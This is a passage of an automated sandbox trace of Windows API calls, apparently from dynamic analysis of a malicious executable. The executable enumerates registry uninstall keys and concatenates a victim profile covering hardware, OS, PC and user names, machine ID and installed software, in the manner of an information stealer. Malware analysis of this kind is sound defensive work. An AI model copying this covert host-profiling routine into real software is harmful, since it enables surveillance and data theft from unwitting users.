14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n" [0175.945] RegCloseKey (hKey=0x354) returned 0x0 [0175.945] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x36, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.945] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}") returned 90 [0175.945] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.945] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x197fd4*=0x3b) returned 0x0 [0175.945] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned 58 [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" [0175.945] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="11.0.61030", lpcbData=0x197fd4*=0xb) returned 0x0 [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 " [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft 